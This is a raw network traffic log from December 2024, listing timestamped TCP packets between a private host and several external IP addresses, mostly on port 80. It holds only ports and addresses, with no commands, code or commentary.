Dec 9, 2024 08:08:53.271845102 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.271867037 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.271976948 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.273422003 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.273433924 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.273472071 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.274987936 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.275000095 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.275011063 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.275094986 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.276588917 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.276601076 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.276638031 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.278150082 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.278162003 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.278279066 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.279725075 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.279736996 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.279777050 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.281383991 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.281395912 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.281407118 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.282562017 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.282887936 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.282900095 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.283260107 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.284435034 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.284454107 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.284496069 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.286053896 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.286065102 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.286106110 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.287581921 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.287595034 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.287632942 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.289196968 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.289211035 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.289222956 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.289256096 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.290746927 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.290756941 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.290798903 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.292315960 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.292326927 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.293987036 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.293998957 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.295511961 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.295525074 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.295535088 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.295547009 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.296957016 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.297086954 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.297105074 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.297782898 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.298666954 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.298680067 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.300246954 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.300257921 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.305079937 CET	49897	80	192.168.2.4	34.107.221.82
Dec 9, 2024 08:08:53.306164980 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.316521883 CET	49908	443	192.168.2.4	34.117.188.166
Dec 9, 2024 08:08:53.316559076 CET	443	49908	34.117.188.166	192.168.2.4
Dec 9, 2024 08:08:53.319837093 CET	49908	443	192.168.2.4	34.117.188.166
Dec 9, 2024 08:08:53.321249008 CET	49908	443	192.168.2.4	34.117.188.166
Dec 9, 2024 08:08:53.321259975 CET	443	49908	34.117.188.166	192.168.2.4
Dec 9, 2024 08:08:53.425405979 CET	80	49897	34.107.221.82	192.168.2.4
Dec 9, 2024 08:08:53.429780960 CET	49897	80	192.168.2.4	34.107.221.82
Dec 9, 2024 08:08:53.486987114 CET	49909	80	192.168.2.4	34.107.221.82
Dec 9, 2024 08:08:53.487097979 CET	49910	80	192.168.2.4	34.107.221.82
Dec 9, 2024 08:08:53.607006073 CET	80	49909	34.107.221.82	192.168.2.4
Dec 9, 2024 08:08:53.607017994 CET	80	49910	34.107.221.82	192.168.2.4
Dec 9, 2024 08:08:53.607085943 CET	49909	80	192.168.2.4	34.107.221.82
Dec 9, 2024 08:08:53.607269049 CET	49909	80	192.168.2.4	34.107.221.82
Dec 9, 2024 08:08:53.607270002 CET	49910	80	192.168.2.4	34.107.221.82
Dec 9, 2024 08:08:53.607386112 CET	49910	80	192.168.2.4	34.107.221.82
Dec 9, 2024 08:08:53.651201963 CET	443	49901	34.160.144.191	192.168.2.4
Dec 9, 2024 08:08:53.654979944 CET	49901	443	192.168.2.4	34.160.144.191
Dec 9, 2024 08:08:53.658016920 CET	49901	443	192.168.2.4	34.160.144.191
Dec 9, 2024 08:08:53.658025980 CET	443	49901	34.160.144.191	192.168.2.4
Dec 9, 2024 08:08:53.658260107 CET	443	49901	34.160.144.191	192.168.2.4
Dec 9, 2024 08:08:53.660316944 CET	49901	443	192.168.2.4	34.160.144.191
Dec 9, 2024 08:08:53.660398960 CET	49901	443	192.168.2.4	34.160.144.191
Dec 9, 2024 08:08:53.660458088 CET	443	49901	34.160.144.191	192.168.2.4
Dec 9, 2024 08:08:53.660526991 CET	49901	443	192.168.2.4	34.160.144.191
Dec 9, 2024 08:08:53.726722956 CET	80	49909	34.107.221.82	192.168.2.4
Dec 9, 2024 08:08:53.726736069 CET	80	49910	34.107.221.82	192.168.2.4
Dec 9, 2024 08:08:53.795447111 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.796935081 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.816184998 CET	5200	49888	185.157.162.216	192.168.2.4
Dec 9, 2024 08:08:53.818125010 CET	49888	5200	192.168.2.4	185.157.162.216
Dec 9, 2024 08:08:53.858993053 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:53.859049082 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:53.938010931 CET	5200	49888	185.157.162.216	192.168.2.4
Dec 9, 2024 08:08:53.938070059 CET	49888	5200	192.168.2.4	185.157.162.216
Dec 9, 2024 08:08:54.060529947 CET	5200	49888	185.157.162.216	192.168.2.4
Dec 9, 2024 08:08:54.196284056 CET	49889	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:54.197042942 CET	49911	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:54.316050053 CET	80	49889	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:54.316199064 CET	49889	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:54.316304922 CET	80	49911	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:54.316824913 CET	49911	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:54.317312956 CET	49911	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:54.407402992 CET	443	49905	142.250.181.78	192.168.2.4
Dec 9, 2024 08:08:54.407475948 CET	49905	443	192.168.2.4	142.250.181.78
Dec 9, 2024 08:08:54.407998085 CET	443	49905	142.250.181.78	192.168.2.4
Dec 9, 2024 08:08:54.408050060 CET	49905	443	192.168.2.4	142.250.181.78
Dec 9, 2024 08:08:54.436613083 CET	80	49911	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:54.517529011 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:54.542538881 CET	443	49908	34.117.188.166	192.168.2.4
Dec 9, 2024 08:08:54.542834044 CET	49908	443	192.168.2.4	34.117.188.166
Dec 9, 2024 08:08:54.629596949 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.636814117 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:54.659326077 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.659766912 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.702830076 CET	80	49909	34.107.221.82	192.168.2.4
Dec 9, 2024 08:08:54.704473972 CET	80	49910	34.107.221.82	192.168.2.4
Dec 9, 2024 08:08:54.707551956 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.748961926 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.749459028 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.749470949 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.749510050 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.758089066 CET	49909	80	192.168.2.4	34.107.221.82
Dec 9, 2024 08:08:54.758521080 CET	49910	80	192.168.2.4	34.107.221.82
Dec 9, 2024 08:08:54.827824116 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.828092098 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.828104973 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.829221010 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.829232931 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.830454111 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.830909014 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.830920935 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.832173109 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.832185984 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.833426952 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.833439112 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.834655046 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.834667921 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.835967064 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.835979939 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.835989952 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.837167025 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.837178946 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.838395119 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.838407040 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.839660883 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.839673042 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.840914011 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.840926886 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.840938091 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.842175007 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.842190027 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.842801094 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.843074083 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.843215942 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.843251944 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.843416929 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.843430042 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.843651056 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.844656944 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.844676971 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.845930099 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.845947027 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.847193956 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.847206116 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.847220898 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.848434925 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.848447084 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.849695921 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.849709034 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.850946903 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.852200985 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.852212906 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.853441954 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.853454113 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.853463888 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.854669094 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.854705095 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.854716063 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.854770899 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.855676889 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.855951071 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.855962992 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.856123924 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.857228994 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.857242107 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.857363939 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.858453989 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.858465910 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.859175920 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.859719992 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.859733105 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.859743118 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.859829903 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.860972881 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.860985994 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.862219095 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.862231970 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.863476992 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.863488913 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.864727974 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.864738941 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.865983009 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.865994930 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.866004944 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.867290020 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.867305040 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.867319107 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.868457079 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.868469000 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.868597031 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.868607044 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.869759083 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.869771957 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.869816065 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.870976925 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.870990038 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.871001005 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.871040106 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.872245073 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.872257948 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.873523951 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.873537064 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.874748945 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.874767065 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.874775887 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.875986099 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.876007080 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.877269030 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.877288103 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.877296925 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.878499985 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.878513098 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.879812002 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.879825115 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.881042004 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.881053925 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.882272959 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.882286072 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.882294893 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.883527040 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.883539915 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.884778976 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.885382891 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.885402918 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.886673927 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.886684895 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.887907982 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.887921095 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.887929916 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.889183044 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.889197111 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.890448093 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.890460968 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.890594959 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.891680956 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.891694069 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.892935038 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.892947912 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.894159079 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.894175053 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.894185066 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.895448923 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.895462036 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.896672964 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.896686077 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.897958994 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.897974968 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.899193048 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.899204969 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.899216890 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.900468111 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.900480986 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.901694059 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.901705980 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.902940035 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.902951956 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.904200077 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.904212952 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.905495882 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.905508995 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.905519962 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.906724930 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.906738997 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.907963991 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.907978058 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.909230947 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.909245014 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.910449028 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.910482883 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.910494089 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.910794020 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.911705971 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.911726952 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.912960052 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.913602114 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.913614988 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.914865971 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.914882898 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.916120052 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.916134119 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.916143894 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.917346001 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.917360067 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.918611050 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.918623924 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.919883966 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.919895887 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.921128035 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.921148062 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.922410011 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.922436953 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.922447920 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.923682928 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.923695087 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.924901009 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.924912930 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.926176071 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.926188946 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.927408934 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.927421093 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.927432060 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.928666115 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.928678036 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.929939032 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.929949999 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.930908918 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.931188107 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.931200981 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.932449102 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.932461023 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.933691978 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.933697939 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.933702946 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:54.933927059 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.933979034 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.934006929 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.934043884 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.934062958 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.934089899 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:54.934117079 CET	49886	80	192.168.2.4	185.215.113.16
